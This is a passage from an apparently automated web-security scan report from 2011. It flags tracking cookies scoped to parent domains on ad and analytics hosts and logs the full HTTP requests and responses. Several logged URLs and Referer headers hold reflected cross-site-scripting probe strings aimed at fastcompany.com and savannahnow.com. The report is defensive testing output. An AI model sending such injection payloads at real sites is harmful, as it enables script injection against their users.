Path:   /load/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /load/?p=104&g=250&j=0 HTTP/1.1
Host: load.exelator.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


10.31. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.32. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.33. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

10.34. http://p.raasnet.com/partners/dfp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

10.35. http://p.raasnet.com/partners/oxmap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEV